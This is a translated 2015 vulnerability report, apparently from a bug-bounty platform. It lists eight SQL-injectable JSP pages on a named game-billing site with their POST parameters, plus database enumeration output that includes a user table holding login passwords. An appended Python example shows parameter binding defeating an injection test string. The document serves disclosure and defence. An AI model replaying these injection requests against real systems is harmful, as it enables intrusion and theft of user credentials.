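2015-08-08: Details reported to the vendor; awaiting vendor handling
2015-08-13: Vendor confirmed; details disclosed to the vendor only
2015-08-23: Details disclosed to core white hats and experts in related fields
2015-09-02: Details disclosed to regular white hats
2015-09-12: Details disclosed to intern white hats
2015-09-27: Details disclosed to the public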
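Multiple injection points bundled into one report, multiple parameters each. Requesting 20 rank.
Blind SQL injection at eight locations, each with multiple parameters.
Location 1 (multiple parameters):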
URL: http://dj.49you.com/web/CPGameManage.jsp
POST data: beginTime=-1&cpName=mnxcfwuf&endTime=2015-08-08&gameNamestr=mnxcfwuf
Injectable parameters: beginTime, cpName, endTime, gameNamestr
Location 2:
URL: http://dj.49you.com/web/cpincome.jsp
POST data: beginTime=-1&cbName=pshrldjs&endTime=1&spName=pshrldjs
Injectable parameters: beginTime, cbName, endTime, spName
Location 3:
URL: http://dj.49you.com/web/cpProvinceList.jsp
POST data: beginTime=2015-08-08&cbName=-1&cityName=xdtmdadm&endTime=2015-08-08
Injectable parameters: cbName, cityName
Location 4:
URL: http://dj.49you.com/web/sy_sjwar_cpincome.jsp
POST data: beginTime=-1&endTime=1&spName=htkwbbeq
Injectable parameters: beginTime, endTime, spName
Location 5:
URL: http://dj.49you.com/web/tab/LyGameIncome.jsp
POST data: appname=-1&beginTime=2015-08-08&channelName=A0001&endTime=2015-08-08&spname=%e5%8c%97%e4%ba%ac%e5%88%9b%e6%84%8f%e6%af%94%e7%89%b9%e4%bf%a1%e6%81%af%e6%8a%80%e6%9c%af%e6%9c%89%e9%99%90%e5%85%ac%e5%8f%b8
Injectable parameters: appname, beginTime, channelName, spname
Location 6:
URL: http://dj.49you.com/web/tab/WoGameIncome.jsp
POST data: appname=-1&beginTime=2015-08-01&channelName=%e5%9b%9b%e4%b9%9d%e6%b8%b8(0028969)&endTime=2015-08-08&spname=%e5%b9%bf%e5%b7%9e%e5%9b%9b%e4%b9%9d%e6%b8%b8&type=%e7%a7%bb%e5%8a%a8MM
Injectable parameters: appname, beginTime, channelName, endTime, spname, type
Location 7:
URL: http://dj.49you.com/web/tab/WoGameIncome0807.jsp
POST data: appname=xhofrmpv&beginTime=-1&channelName=%e5%9b%9b%e4%b9%9d%e6%b8%b8(0027913)&endTime=2015-08-08&spname=%e6%99%8b%e6%98%b6&type=%e7%a7%bb%e5%8a%a8MM
Injectable parameters: beginTime, endTime, spname, type
Location 8:
URL: http://dj.49you.com/web/tab/WoGameIncome2.jsp
POST data: beginTime=2015-08-01&endTime=2015-08-08&spname=%e5%b9%bf%e5%b7%9e%e5%9b%9b%e4%b9%9d%e6%b8%b8
Injectable parameters: beginTime, endTime, spname
web application technology: Nginx
back-end DBMS: Microsoft SQL Server 2012
current user: 'sp'
current database: 'SP'
current user is DBA: False
available databases [17]:
[*] Administration
[*] blacklist
[*] Company
[*] DataBack
[*] master
[*] model
[*] msdb
[*] new_system
[*] NZIformation
[*] ReportServer
[*] ReportServerTempDB
[*] shouYou
[*] SP
[*] SP2
[*] tempdb
[*] Test
[*] wap_game

web application technology: Nginx, JSP
back-end DBMS: Microsoft SQL Server 2012
Database: SP
[108 tables]
+---------------------+
| CityList            |
| Ctstats             |
| DHXGame_User        |
| DXBaoYueZDYJH       |
| OnlineProvince      |
| PcInterface         |
| ProvinceCity        |
| ProvinceList        |
| amountTable         |
| baoyue              |
| baoyue2             |
| black_imsi          |
| by_send             |
| cp_channel          |
| cpbaccount          |
| cppay               |
| cppay_date          |
| cppay_pro           |
| dx_imsinum_mrtj     |
| dx_phonenum_motj    |
| dx_phonenum_mrtj    |
| dxbaoyuesendrecord  |
| dxopencity          |
| dxspid              |
| fee_request         |
| fee_request1        |
| fp                  |
| fptaxrate           |
| game                |
| gameIncome          |
| gametype            |
| gamezhou            |
| hourinfo            |
| imei                |
| importtxt           |
| imsi                |
| imsi0716            |
| interfaceAgency     |
| kftsManage          |
| ltgamerecv          |
| ltsjyx              |
| ltwogame            |
| mmLoginInfor        |
| mmOrder             |
| mmShow              |
| mm_list             |
| mm_rule             |
| mmcompany           |
| mmctrl              |
| mmqrecv             |
| mmrecv              |
| monthinformation    |
| mosync              |
| mrsync              |
| newCityList         |
| nz_cp               |
| pb_cp               |
| pcgame              |
| pcgameid            |
| pcweb               |
| pinbi_cp            |
| price               |
| pro_tj              |
| recv_mo             |
| recvrecord          |
| rules               |
| send_mr             |
| sendrecord          |
| servicetype         |
| settlement          |
| settlement_back     |
| settlement_pro      |
| sjqbrecv            |
| smsrecv             |
| sq_phonenum_tj      |
| tb_Day_Stat         |
| tb_LINE             |
| tb_LyDay_Stat       |
| tb_LyDay_Stat0707   |
| tb_LyDay_Stat_0702  |
| tb_SP               |
| tb_byDDmo           |
| tb_byDDmr           |
| tb_informMM         |
| tb_monthcalculate   |
| tb_spinformation    |
| tb_sppay            |
| tb_wyurlmanage      |
| telimsi             |
| telrecv             |
| telrecvs            |
| temp_send           |
| temp_send1          |
| temp_send2          |
| testsendrecord      |
| text                |
| textlink            |
| tj                  |
| tjOrd2              |
| tjbakbak            |
| update_rules_record |
| vbtj                |
| vw_rules            |
| wjwar               |
| wx_Login_Type       |
| wx_User             |
| xiaoguobiao         |
| zxf_cp              |
+---------------------+

web application technology: Nginx, JSP
back-end DBMS: Microsoft SQL Server 2012
Database: SP
Table: wx_User
[6 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| COMPANY_NAME | varchar  |
| ID           | int      |
| INSERT_TIME  | datetime |
| LOGIN_NAME   | varchar  |
| LOGIN_PASS   | varchar  |
| TYPE_ID      | int      |
+--------------+----------+
Filter the parameters. There are also many XSS issues; I recommend a systematic check of this site.
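The fix recommended above, sketched as an added example that is not part of the original report or the vendor's code: a date-range report query built by string concatenation next to a version that allow-lists the date format and binds every value. The server-side code is not shown in the report, so the concatenation pattern, the `income` table, the function names and the use of SQLite in place of SQL Server are all assumptions.

```python
import re
import sqlite3

DATE_RE = re.compile(r"\d{4}-\d{2}-\d{2}")

def make_db():
    # Constructed stand-in table; the real schema behind the JSP pages is unknown.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE income (sp_name TEXT, day TEXT, amount INTEGER)")
    db.executemany("INSERT INTO income VALUES (?, ?, ?)", [
        ("sp_a", "2015-08-01", 100),
        ("sp_a", "2015-08-08", 250),
        ("sp_b", "2015-08-08", 999),
    ])
    return db

def query_concat(db, begin_time, end_time, sp_name):
    # Assumed vulnerable pattern: request values pasted into the SQL text,
    # so a quote in any parameter changes the structure of the statement.
    sql = ("SELECT sp_name, day, amount FROM income WHERE day >= '" + begin_time +
           "' AND day <= '" + end_time + "' AND sp_name = '" + sp_name + "'")
    return db.execute(sql).fetchall()

def query_bound(db, begin_time, end_time, sp_name):
    # Hardened: reject anything that is not a YYYY-MM-DD date (beginTime=-1 fails
    # here), cap the free-text field, then bind all values as parameters.
    for name, value in (("beginTime", begin_time), ("endTime", end_time)):
        if not DATE_RE.fullmatch(value):
            raise ValueError(f"{name} is not a YYYY-MM-DD date")
    if len(sp_name) > 64:
        raise ValueError("spName too long")
    sql = ("SELECT sp_name, day, amount FROM income "
           "WHERE day >= ? AND day <= ? AND sp_name = ?")
    return db.execute(sql, (begin_time, end_time, sp_name)).fetchall()

if __name__ == "__main__":
    db = make_db()
    quoted = "sp_a' OR '1'='1"  # constructed test value containing quotes
    print("concatenated:", query_concat(db, "2015-08-01", "2015-08-08", quoted))
    print("bound:       ", query_bound(db, "2015-08-01", "2015-08-08", quoted))
    print("legitimate:  ", query_bound(db, "2015-08-01", "2015-08-08", "sp_a"))
```

With the quoted test value, the concatenated query returns rows belonging to every provider, while the bound query treats the whole string as a provider name and returns nothing.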
Severity: High
Vulnerability Rank: 20
Confirmed: 2015-08-13 09:10
Thanks, 路人甲. We are arranging for our technical team to handle this.
None yet